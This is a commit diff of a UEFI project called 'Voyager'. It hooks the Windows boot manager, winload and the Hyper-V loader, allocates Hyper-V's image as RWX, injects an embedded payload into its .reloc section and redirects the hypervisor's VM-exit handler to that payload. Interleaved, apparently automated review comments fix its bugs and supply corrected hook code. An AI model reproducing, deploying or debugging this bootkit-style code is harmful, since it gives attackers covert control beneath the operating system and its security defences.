parent
ac1b24e5c4
commit
dc4c5e3ff2
@ -1,8 +0,0 @@
|
||||
#include <iostream>
|
||||
#include "com.h"
|
||||
|
||||
int main()
|
||||
{
|
||||
std::printf("[+] hyper-v (CPUID) result -> 0x%x\n", cpuid_test(VMEXIT_KEY));
|
||||
std::getchar();
|
||||
}
|
@ -1,7 +1,7 @@
|
||||
_text segment
|
||||
cpuid_test proc
|
||||
hyperv proc
|
||||
cpuid
|
||||
ret
|
||||
cpuid_test endp
|
||||
hyperv endp
|
||||
_text ends
|
||||
end
|
@ -1,3 +1,3 @@
|
||||
#pragma once
|
||||
#define VMEXIT_KEY 0xDEADBEEFDEADBEEF
|
||||
extern "C" size_t cpuid_test(size_t key);
|
||||
extern "C" size_t hyperv(size_t key);
|
@ -0,0 +1,8 @@
|
||||
#include <iostream>
|
||||
#include "com.h"
|
||||
|
||||
int main()
|
||||
{
|
||||
std::printf("[+] hyper-v (CPUID) result -> 0x%x\n", hyperv(VMEXIT_KEY));
|
||||
std::getchar();
|
||||
}
|
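Review bot: `std::printf("... 0x%x\n", hyperv(VMEXIT_KEY))` passes a `size_t` to `%x`, which expects `unsigned int`; on a 64-bit build that is undefined behaviour and at best prints only the low 32 bits of the result. Use `%zx`, or cast the value to `unsigned long long` and print it with `%llx`. `<iostream>` is included but only `std::printf` and `std::getchar` are used, so `<cstdio>` is the header this file actually depends on.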
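--- /dev/null
+++ b/BootMgfw.c
@@ -0,0 +1,95 @@
+#include "BootMgfw.h"
+
+SHITHOOK BootMgfwShitHook;
+EFI_DEVICE_PATH* EFIAPI GetBootMgfwPath(VOID)
+{
+UINTN HandleCount = NULL;
+EFI_STATUS Result;
+EFI_HANDLE* Handles = NULL;
+EFI_DEVICE_PATH* DevicePath = NULL;
+EFI_FILE_HANDLE VolumeHandle;
+EFI_FILE_HANDLE BootMgfwHandle;
+EFI_FILE_IO_INTERFACE* FileSystem = NULL;
+
+// get all the handles to file systems...
+if (EFI_ERROR((Result = gBS->LocateHandleBuffer(ByProtocol, &gEfiSimpleFileSystemProtocolGuid, NULL, &HandleCount, &Handles))))
+{
+Print(L"error getting file system handles -> 0x%p\n", Result);
+return DevicePath;
+}
+
+// for each handle to the file system, open a protocol with it...
+for (UINT32 Idx = 0u; Idx < HandleCount && !FileSystem; ++Idx)
+{
+if (EFI_ERROR((Result = gBS->OpenProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, (VOID**)&FileSystem, gImageHandle, NULL, EFI_OPEN_PROTOCOL_GET_PROTOCOL))))
+{
+Print(L"error opening protocol -> 0x%p\n", Result);
+return DevicePath;
+}
+
+if (EFI_ERROR((Result = FileSystem->OpenVolume(FileSystem, &VolumeHandle))))
+{
+Print(L"error opening file system -> 0x%p\n", Result);
+return DevicePath;
+}
+
+// if we found the correct file (\\efi\\microsoft\\boot\\bootmgfw.efi)
+if (!EFI_ERROR(VolumeHandle->Open(VolumeHandle, &BootMgfwHandle, WINDOWS_BOOTMGR_PATH, EFI_FILE_MODE_READ, EFI_FILE_READ_ONLY)))
+DevicePath = FileDevicePath(Handles[Idx], WINDOWS_BOOTMGR_PATH);
+
+VolumeHandle->Close(BootMgfwHandle);
+if (EFI_ERROR((Result = gBS->CloseProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, gImageHandle, NULL))))
+{
+Print(L"error closing protocol -> 0x%p\n", Result);
+return DevicePath;
+}
+}
+return DevicePath;
+}
+
+EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath)
+{
+EFI_STATUS Result = EFI_SUCCESS;
+EFI_LOADED_IMAGE* BootMgfw = NULL;
+
+if (EFI_ERROR((Result = gBS->HandleProtocol(BootMgfwPath, &gEfiLoadedImageProtocolGuid, (VOID**)&BootMgfw))))
+return Result;
+
+Print(L"Image Base -> 0x%p\n", BootMgfw->ImageBase);
+Print(L"Image Size -> 0x%x\n", BootMgfw->ImageSize);
+
+VOID* ArchStartBootApplication =
+FindPattern(
+BootMgfw->ImageBase,
+BootMgfw->ImageSize,
+START_BOOT_APPLICATION_SIG,
+START_BOOT_APPLICATION_MASK
+);
+
+if (!ArchStartBootApplication)
+return EFI_ABORTED;
+
+Print(L"ArchStartBootApplication -> 0x%p\n", RESOLVE_RVA(ArchStartBootApplication, 5, 1));
+MakeShitHook(&BootMgfwShitHook, RESOLVE_RVA(ArchStartBootApplication, 5, 1), &ArchStartBootApplicationHook, TRUE);
+return Result;
+}
+
+EFI_STATUS EFIAPI ArchStartBootApplicationHook(VOID* AppEntry, VOID* ImageBase, UINT32 ImageSize, UINT8 BootOption, VOID* ReturnArgs)
+{
+DisableShitHook(&BootMgfwShitHook);
+VOID* ImgLoadPEImageEx =
+FindPattern(
+ImageBase,
+ImageSize,
+LOAD_PE_IMG_SIG,
+LOAD_PE_IMG_MASK
+);
+
+Print(L"PE PayLoad Size -> 0x%x\n", PayLoadSize());
+Print(L"winload base -> 0x%p\n", ImageBase);
+Print(L"winload size -> 0x%x\n", ImageSize);
+Print(L"winload.BlImgLoadPEImageEx -> 0x%p\n", RESOLVE_RVA(ImgLoadPEImageEx, 5, 1));
+
+MakeShitHook(&WinLoadImageShitHook, RESOLVE_RVA(ImgLoadPEImageEx, 5, 1), &BlImgLoadPEImageEx, TRUE);
+return ((IMG_ARCH_START_BOOT_APPLICATION)BootMgfwShitHook.Address)(AppEntry, ImageBase, ImageSize, BootOption, ReturnArgs);
+}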
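Review bot: `VolumeHandle->Close(BootMgfwHandle)` in `GetBootMgfwPath` runs whether or not the `VolumeHandle->Open` just above it succeeded, so on the failure path an uninitialised `BootMgfwHandle` is handed to Close; move that line inside the `if (!EFI_ERROR(...))` branch. The loop condition `Idx < HandleCount && !FileSystem` also ends the loop after the first handle, because `FileSystem` is set by the first successful `OpenProtocol` and never cleared — add `FileSystem = NULL;` after the `CloseProtocol` call if every volume is meant to be scanned, and release the `LocateHandleBuffer` result with `FreePool(Handles);` before each return. In `ArchStartBootApplicationHook` the `FindPattern` result `ImgLoadPEImageEx` is fed to `RESOLVE_RVA` without the NULL check that `InstallBootMgfwHooks` performs, so a missed signature reads through address 1; guard it and skip the `MakeShitHook` call (still forwarding to the original) when it is NULL.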
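--- /dev/null
+++ b/BootMgfw.h
@@ -0,0 +1,27 @@
+#pragma once
+#include <Uefi.h>
+#include <Library/UefiLib.h>
+#include <Library/DebugLib.h>
+#include <Library/MemoryAllocationLib.h>
+#include <Library/UefiBootServicesTableLib.h>
+#include <Library/UefiRuntimeServicesTableLib.h>
+#include <Library/DevicePathLib.h>
+#include <Library/PrintLib.h>
+#include <Protocol/SimpleFileSystem.h>
+#include <Protocol/LoadedImage.h>
+#include <IndustryStandard/PeImage.h>
+#include <Guid/GlobalVariable.h>
+#include "WinLoad.h"
+
+#if WINVER >= 1607
+#define START_BOOT_APPLICATION_SIG "\xE8\x00\x00\x00\x00\x48\x8B\xCE\x8B\xD8\xE8\x00\x00\x00\x00\x41\x8B\xCF"
+#define START_BOOT_APPLICATION_MASK "x????xxxxxx????xxx"
+#endif
+
+static_assert(sizeof(START_BOOT_APPLICATION_SIG) == sizeof(START_BOOT_APPLICATION_MASK), "signature and mask size's dont match...");
+#define WINDOWS_BOOTMGR_PATH L"\\efi\\microsoft\\boot\\bootmgfw.efi"
+extern SHITHOOK BootMgfwShitHook;
+typedef EFI_STATUS(EFIAPI* IMG_ARCH_START_BOOT_APPLICATION)(VOID*, VOID*, UINT32, UINT8, VOID*);
+EFI_DEVICE_PATH* EFIAPI GetBootMgfwPath(VOID);
+EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath);
+EFI_STATUS EFIAPI ArchStartBootApplicationHook(VOID* AppEntry, VOID* ImageBase, UINT32 ImageSize, UINT8 BootOption, VOID* ReturnArgs);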
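Review bot: `#if WINVER >= 1607` has no `#else`, so for any other `WINVER` the signature macros are simply undefined and the `static_assert` below fails with an "undeclared identifier" rather than a useful message; add `#else` / `#error "no bootmgfw signature for this WINVER"` before the `#endif`. `InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath)` receives a handle that is passed to `HandleProtocol`, while `GetBootMgfwPath` returns an `EFI_DEVICE_PATH*`; naming the parameter `BootMgfwHandle` would stop a reader from passing the device path. `static_assert` in a C translation unit depends on the compiler's C11 support or on `<assert.h>`, which this header does not include — worth confirming it is the intended spelling for the C mode this project builds in.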
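--- /dev/null
+++ b/HvLoader.c
@@ -0,0 +1,87 @@
+#include "HvLoader.h"
+
+SHITHOOK HvLoadImageHook;
+SHITHOOK HvLoadAllocImageHook;
+BOOLEAN ExtendedAllocation = FALSE;
+BOOLEAN HookedHyperV = FALSE;
+
+EFI_STATUS EFIAPI HvBlImgLoadPEImageFromSourceBuffer(VOID* a1, VOID* a2, VOID* a3, VOID* a4, UINT64* ImageBase,
+UINT32* ImageSize, VOID* a7, VOID* a8, VOID* a9, VOID* a10, VOID* a11, VOID* a12, VOID* a13, VOID* a14, VOID* a15)
+{
+DisableShitHook(&HvLoadImageHook);
+EFI_STATUS Result = ((HV_LDR_LOAD_IMAGE)HvLoadImageHook.Address)(a1, a2, a3, a4, ImageBase, ImageSize, a7, a8,
+a9, a10, a11, a12, a13, a14, a15);
+EnableShitHook(&HvLoadImageHook);
+
+if (ExtendedAllocation && !HookedHyperV)
+{
+HookedHyperV = TRUE;
+EFI_IMAGE_DOS_HEADER* HypervDosHeader = *ImageBase;
+if (HypervDosHeader->e_magic != EFI_IMAGE_DOS_SIGNATURE)
+return NULL;
+
+EFI_IMAGE_NT_HEADERS64* HypervNtHeader = (UINT64)HypervDosHeader + HypervDosHeader->e_lfanew;
+if (HypervNtHeader->Signature != EFI_IMAGE_NT_SIGNATURE)
+return NULL;
+
+EFI_IMAGE_SECTION_HEADER* pSection = ((UINT64)&HypervNtHeader->OptionalHeader) +
+HypervNtHeader->FileHeader.SizeOfOptionalHeader;
+
+for (UINT16 i = 0; i < HypervNtHeader->FileHeader.NumberOfSections; i += 1, pSection += 1)
+{
+if (!AsciiStrCmp(&pSection->Name, ".reloc"))
+{
+VOYAGER_DATA_T VoyagerData;
+MakeVoyagerData
+(
+&VoyagerData,
+*ImageBase,
+*ImageSize,
+*ImageBase + pSection->VirtualAddress + pSection->Misc.VirtualSize,
+PayLoadSize()
+);
+
+DBG_PRINT(".reloc section base address -> 0x%p\n", *ImageBase + pSection->VirtualAddress);
+DBG_PRINT(".reloc section end (aka golden record base address) -> 0x%p\n", *ImageBase + pSection->VirtualAddress + pSection->Misc.VirtualSize);
+
+VOID* VmExitHook = MapModule(&VoyagerData, PayLoad);
+VOID* VmExitFunction = HookVmExit
+(
+VoyagerData.HypervModuleBase,
+VoyagerData.HypervModuleSize,
+VmExitHook
+);
+
+pSection->Characteristics = SECTION_RWX;
+pSection->Misc.VirtualSize += PayLoadSize();
+DBG_PRINT("VmExitHook (PayLoad Entry Point) -> 0x%p\n", VmExitHook);
+}
+}
+
+HypervNtHeader->OptionalHeader.SizeOfImage += PayLoadSize();
+*ImageSize += PayLoadSize();
+}
+
+DBG_PRINT("[HvLoader (Load Image)] ImageBase -> 0x%p, ImageSize -> 0x%p\n", *ImageBase, *ImageSize);
+return Result;
+}
+
+UINT64 EFIAPI HvLoaderBlImgAllocateImageBuffer(VOID** imageBuffer, UINTN imageSize, UINT32 memoryType, UINT32 attributes, VOID* unused, UINT32 flags)
+{
+if (imageSize == HV_ALLOC_SIZE && !ExtendedAllocation)
+{
+ExtendedAllocation = TRUE;
+imageSize += PayLoadSize();
+
+// allocate the entire hyper-v module as rwx...
+memoryType = BL_MEMORY_ATTRIBUTE_RWX;
+}
+
+DisableShitHook(&HvLoadAllocImageHook);
+UINT64 Result = ((ALLOCATE_IMAGE_BUFFER)HvLoadAllocImageHook.Address)(imageBuffer, imageSize, memoryType, attributes, unused, flags);
+if(!ExtendedAllocation)
+EnableShitHook(&HvLoadAllocImageHook);
+
+DBG_PRINT("[HvLoader (Alloc Image Memory)] Allocated memory -> 0x%p, size -> 0x%x\n", *imageBuffer, imageSize);
+return Result;
+}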
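Review bot: The two `return NULL;` statements in `HvBlImgLoadPEImageFromSourceBuffer` return 0, which is `EFI_SUCCESS`, so a buffer that fails the DOS/NT signature checks is reported to the loader as a successful load with the patch silently skipped; return `Result` if pass-through is intended, or an EFI error code if the boot should stop. The hooked loader's `Result` is also never checked before `*ImageBase` is dereferenced, so on a failed load the header walk runs over whatever `ImageBase` happens to hold. `AsciiStrCmp(&pSection->Name, ".reloc")` reads past `Name` when a section uses all eight name bytes (the field is not NUL-terminated); compare with `AsciiStrnCmp` bounded by `sizeof(pSection->Name)`. In `HvLoaderBlImgAllocateImageBuffer` the comment says the module is made RWX, but it is `memoryType` rather than `attributes` that is overwritten with `BL_MEMORY_ATTRIBUTE_RWX` — presumably deliberate, yet the parameter names suggest otherwise, so a comment should state which argument the loader actually treats as the protection mask.
```c
EnableShitHook(&HvLoadImageHook);
if (EFI_ERROR(Result))
    return Result;              // load failed: *ImageBase cannot be trusted, pass the status through

if (ExtendedAllocation && !HookedHyperV)
{
    HookedHyperV = TRUE;
    EFI_IMAGE_DOS_HEADER* HypervDosHeader = (EFI_IMAGE_DOS_HEADER*)*ImageBase;
    if (HypervDosHeader->e_magic != EFI_IMAGE_DOS_SIGNATURE)
        return Result;          // not a PE image: leave it untouched, report the loader's own status

    EFI_IMAGE_NT_HEADERS64* HypervNtHeader = (EFI_IMAGE_NT_HEADERS64*)((UINT64)HypervDosHeader + HypervDosHeader->e_lfanew);
    if (HypervNtHeader->Signature != EFI_IMAGE_NT_SIGNATURE)
        return Result;
    // … unchanged: section table pointer setup …
    if (!AsciiStrnCmp((CHAR8*)pSection->Name, ".reloc", sizeof(pSection->Name)))
    // … unchanged: payload mapping, vmexit hook, section extension …
```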
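--- /dev/null
+++ b/HvLoader.h
@@ -0,0 +1,30 @@
+#pragma once
+#include "Utils.h"
+#include "PayLoad.h"
+#include "Hvix64.h"
+
+#if WINVER >= 1607
+#define ALLOCATE_IMAGE_BUFFER_SIG "\xE8\x00\x00\x00\x00\x4C\x8B\x65\x60"
+#define ALLOCATE_IMAGE_BUFFER_MASK "x????xxxx"
+#endif
+
+#if WINVER == 1703
+#define HV_LOAD_PE_IMG_SIG "\xE8\x00\x00\x00\x00\x44\x8B\xAD"
+#define HV_LOAD_PE_IMG_MASK "x????xxx"
+#elif WINVER == 1607
+#define HV_LOAD_PE_IMG_SIG "\xE8\x00\x00\x00\x00\x48\x8B\x4D\x80\x41\x8B\xD4"
+#define HV_LOAD_PE_IMG_MASK "x????xxxxxxx"
+#endif
+
+static_assert(sizeof(HV_LOAD_PE_IMG_SIG) == sizeof(HV_LOAD_PE_IMG_MASK), "signature and mask do not match size...");
+static_assert(sizeof(ALLOCATE_IMAGE_BUFFER_SIG) == sizeof(ALLOCATE_IMAGE_BUFFER_MASK), "signature and mask do not match size!");
+typedef EFI_STATUS(EFIAPI* ALLOCATE_IMAGE_BUFFER)(VOID** imageBuffer, UINTN imageSize, UINT32 memoryType, UINT32 attributes, VOID* unused, UINT32 flags);
+typedef EFI_STATUS(EFIAPI* HV_LDR_LOAD_IMAGE)(VOID* a1, VOID* a2, VOID* a3, VOID* a4, UINT64* ImageBase,
+UINT32* ImageSize, VOID* a7, VOID* a8, VOID* a9, VOID* a10, VOID* a11, VOID* a12, VOID* a13, VOID* a14, VOID* a15);
+
+UINT64 EFIAPI HvLoaderBlImgAllocateImageBuffer(VOID** imageBuffer, UINTN imageSize, UINT32 memoryType, UINT32 attributes, VOID* unused, UINT32 flags);
+EFI_STATUS EFIAPI HvBlImgLoadPEImageFromSourceBuffer(VOID* a1, VOID* a2, VOID* a3, VOID* a4, UINT64* ImageBase,
+UINT32* ImageSize, VOID* a7, VOID* a8, VOID* a9, VOID* a10, VOID* a11, VOID* a12, VOID* a13, VOID* a14, VOID* a15);
+
+extern SHITHOOK HvLoadImageHook;
+extern SHITHOOK HvLoadAllocImageHook;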
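Review bot: `ALLOCATE_IMAGE_BUFFER` is typed as returning `EFI_STATUS`, but the hook `HvLoaderBlImgAllocateImageBuffer` that replaces it is declared `UINT64`; the two should agree, and `EFI_STATUS` is the natural choice since the original's result is returned unchanged. Both `#if WINVER` blocks lack an `#else`, so an unsupported `WINVER` leaves `HV_LOAD_PE_IMG_SIG` / `ALLOCATE_IMAGE_BUFFER_SIG` undefined and the `static_assert`s fail with a misleading "undeclared identifier" error; add `#else` / `#error "unsupported WINVER"` to each. A one-line comment above `HV_LDR_LOAD_IMAGE` noting that `a1`..`a15` are opaque arguments forwarded untouched, with only `ImageBase`/`ImageSize` interpreted, would document the contract the hook relies on.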
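--- /dev/null
+++ b/Hvix64.h
@@ -0,0 +1,40 @@
+#pragma once
+#include "PayLoad.h"
+
+#define HV_ALLOC_SIZE 0x1400000
+#if WINVER == 1703
+#define VMEXIT_HANDLER_SIG "\xD0\x80\x3D\x74\xCC\x47\x00\x00\x0F\x84\x00\x00\x00\x00\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9"
+#define VMEXIT_HANDLER_MASK "xxxxxx??xx????xxxx?x????x"
+#elif WINVER == 1607
+#define VMEXIT_HANDLER_SIG "\xD0\x80\x3D\xB4\x9F\x49\x00\x00\x0F\x84\x00\x00\x00\x00\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9"
+#define VMEXIT_HANDLER_MASK "xxxxxx??xx????xxxx?x????x"
+#endif
+
+static_assert(sizeof(VMEXIT_HANDLER_SIG) == sizeof(VMEXIT_HANDLER_MASK), "signature does not match mask size!");
+static_assert(sizeof(VMEXIT_HANDLER_SIG) == 26, "signature is invalid length!");
+
+//
+// AllocBase is the base address of the extra memory allocated below where hyper-v is
+// AllocSize is the size of the extra allocated memory... This size == module size...
+//
+VOID* MapModule(PVOYAGER_DATA_T VoyagerData, UINT8* ImageBase);
+
+//
+// sig scan hv.exe for vmexit call and replace the relative call (RVA) with
+// an RVA to the vmexit handler hook (which is the golden records entry point)...
+//
+// returns a pointer to the original vmexit function address...
+//
+VOID* HookVmExit(VOID* HypervBase, VOID* HypervSize, VOID* VmExitHook);
+
+//
+// creates a structure with all the data needed to be passed to the golden record...
+//
+VOID MakeVoyagerData
+(
+PVOYAGER_DATA_T VoyagerData,
+VOID* HypervAlloc,
+UINT64 HypervAllocSize,
+VOID* PayLoadBase,
+UINT64 PayLoadSize
+);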
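Review bot: `VMEXIT_HANDLER_SIG` keeps the bytes `\x74\xCC\x47` (1703) / `\xB4\x9F\x49` (1607) fixed right after `80 3D`, which by position look like the low three bytes of a RIP-relative disp32 (`cmp byte ptr [rip+disp32], imm8`); if that is the encoding they are specific to one hv build and the mask should wildcard all four displacement bytes (`xxx?????…`) rather than only the last two, otherwise the scan breaks on any other patch level of the same `WINVER` — worth confirming against the disassembly. `HookVmExit` declares `HypervSize` as `VOID*` but is called with a `UINT64` (`VoyagerData.HypervModuleSize`); declare it `UINT64` so the call does not rely on an implicit integer-to-pointer conversion. The comment above `MapModule` describes `AllocBase`/`AllocSize` parameters the function does not have; rewrite it to describe `VoyagerData` and `ImageBase`. `HV_ALLOC_SIZE` identifies the hypervisor image purely by its allocation size, which is equally build-specific, so a comment stating which hv build it was measured from would save the next person a debugging session.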
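--- /dev/null
+++ b/PayLoad.h
@@ -0,0 +1,17 @@
+#pragma once
+#include "Utils.h"
+extern unsigned char PayLoad[3072];
+
+#pragma pack(push, 1)
+typedef struct _VOYAGER_DATA_T
+{
+UINT64 VmExitHandlerRva;
+UINT64 HypervModuleBase;
+UINT64 HypervModuleSize;
+UINT64 ModuleBase;
+UINT64 ModuleSize;
+} VOYAGER_DATA_T, * PVOYAGER_DATA_T;
+#pragma pack(pop)
+
+UINT32 PayLoadSize(VOID);
+VOID* PayLoadEntry(VOID* ModuleBase);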
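Review bot: `extern unsigned char PayLoad[3072];` and `PayLoadSize()` are two independent statements of the payload size; if the blob is regenerated at a different length one of them silently goes stale, so either have `PayLoadSize`'s implementation derive the value from `sizeof PayLoad` or add a comment saying which of the two is authoritative. `VOYAGER_DATA_T` is, per the `MakeVoyagerData` comment, handed to the payload ("golden record"), so its packing and field order are an ABI contract with code outside this project; a comment such as `// layout shared with the PayLoad blob — do not reorder or widen fields` above the struct would make that explicit.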
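--- /dev/null
+++ b/Utils.h
@@ -0,0 +1,35 @@
+#pragma once
+#include "ShitHook.h"
+#define WINVER 1703
+#define PORT_NUM 0x2F8
+#define BL_MEMORY_ATTRIBUTE_RWX 0x424000
+#define SECTION_RWX (EFI_IMAGE_SCN_MEM_READ | EFI_IMAGE_SCN_MEM_WRITE | EFI_IMAGE_SCN_MEM_EXECUTE)
+
+VOID __outbytestring(UINT16 Port, UINT8* Buffer, UINT32 Count);
+void __outbyte(unsigned short Port, unsigned char Data);
+#pragma intrinsic(__outbytestring)
+#pragma intrinsic(__outbyte)
+
+static CHAR8 dbg_buffer[0x100];
+#define DBG_PRINT(...) \
+AsciiSPrint(dbg_buffer, sizeof dbg_buffer, __VA_ARGS__); \
+__outbytestring(PORT_NUM, dbg_buffer, AsciiStrLen(dbg_buffer))
+
+#define RESOLVE_RVA(SIG_RESULT, RIP_OFFSET, RVA_OFFSET) \
+(*(INT32*)(((UINT64)SIG_RESULT) + RVA_OFFSET)) + ((UINT64)SIG_RESULT) + RIP_OFFSET
+
+typedef struct _LDR_DATA_TABLE_ENTRY
+{
+LIST_ENTRY InLoadOrderLinks; // 16
+LIST_ENTRY InMemoryOrderLinks; // 32
+LIST_ENTRY InInitializationOrderLinks; // 48
+UINT64 ModuleBase; // 56
+UINT64 EntryPoint; // 64
+UINTN SizeOfImage; // 72
+} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY, **PPLDR_DATA_TABLE_ENTRY;
+
+// taken from umap (btbd)
+BOOLEAN CheckMask(CHAR8* base, CHAR8* pattern, CHAR8* mask);
+VOID* FindPattern(CHAR8* base, UINTN size, CHAR8* pattern, CHAR8* mask);
+VOID* GetExport(UINT8* base, CHAR8* export);
+VOID MemCopy(VOID* dest, VOID* src, UINTN size);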
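Review bot: `DBG_PRINT` expands to two statements with no `do { ... } while (0)` wrapper, so `if (cond) DBG_PRINT(...);` formats conditionally but writes whatever `dbg_buffer` holds to the port unconditionally; wrap it: `#define DBG_PRINT(...) do { AsciiSPrint(dbg_buffer, sizeof dbg_buffer, __VA_ARGS__); __outbytestring(PORT_NUM, (UINT8*)dbg_buffer, (UINT32)AsciiStrLen(dbg_buffer)); } while (0)`. `RESOLVE_RVA` has no outer parentheses and none around its arguments, so `(VOID*)RESOLVE_RVA(p, 5, 1)` casts only the first term; `#define RESOLVE_RVA(SIG_RESULT, RIP_OFFSET, RVA_OFFSET) (((UINT64)(SIG_RESULT)) + (RIP_OFFSET) + (*(INT32*)(((UINT64)(SIG_RESULT)) + (RVA_OFFSET))))` keeps the same value and is safe in any expression. `static CHAR8 dbg_buffer[0x100]` in a header gives every translation unit its own copy and `AsciiSPrint` truncates silently at 0x100 bytes — acceptable for serial tracing, but worth a comment. `#define WINVER 1703` here is the single switch every `#if WINVER` signature block keys on; a comment at the define saying so, and listing the supported values, would help whoever ports this to another build.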
@ -0,0 +1,198 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<ProjectGuid>{C4B6B437-62DF-4166-9023-44CFC8A52258}</ProjectGuid>
|
||||
<RootNamespace>HyperMe</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
<ProjectName>Voyager (1703-1511)</ProjectName>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<PreferredToolArchitecture>x86</PreferredToolArchitecture>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<PreferredToolArchitecture>x86</PreferredToolArchitecture>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<IncludePath>$(ProjectDir)edk2\CryptoPkg\Include;$(ProjectDir)edk2\ShellPkg\Include;$(ProjectDir)edk2\MdePkg\Include\X64;$(ProjectDir)edk2\MdePkg\Include</IncludePath>
|
||||
<LibraryPath>$(ProjectDir)edk2</LibraryPath>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
<TargetExt>.efi</TargetExt>
|
||||
<SourcePath>$(ProjectDir)</SourcePath>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<IncludePath>$(ProjectDir)edk2\CryptoPkg\Include;$(ProjectDir)edk2\ShellPkg\Include;$(ProjectDir)edk2\MdePkg\Include\X64;$(ProjectDir)edk2\MdePkg\Include;$(ProjectDir)edk2\StdLib\Include;$(ProjectDir)</IncludePath>
|
||||
<LibraryPath>$(ProjectDir)edk2</LibraryPath>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
<TargetExt>.efi</TargetExt>
|
||||
<SourcePath>$(ProjectDir)</SourcePath>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
